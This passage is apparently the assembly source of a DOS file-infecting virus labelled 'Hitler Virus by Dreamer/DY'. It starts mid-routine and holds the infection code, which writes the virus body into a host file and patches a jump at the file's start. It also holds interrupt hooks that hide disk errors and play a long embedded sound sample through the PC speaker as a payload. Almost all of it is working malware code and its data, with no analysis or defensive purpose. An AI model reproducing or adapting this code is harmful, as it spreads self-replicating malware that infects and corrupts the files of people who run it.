mov word ptr putjmp[1],ax
mov ah,40h
mov cx,size
mov dx,100h
call int21
jc close
cmp ax,size
jne close
mov ax,4200h
xor cx,cx
xor dx,dx
call int21
mov ah,40h
mov cx,5
mov dx,offset putjmp
call int21
or byte ss:[bp],31
jmp close
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf
cli
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
cmp teller,0
je teller_ok
dec teller
jmp noreset
teller_ok:
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample
jb noreset
mov xofs,offset sample
noreset:
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
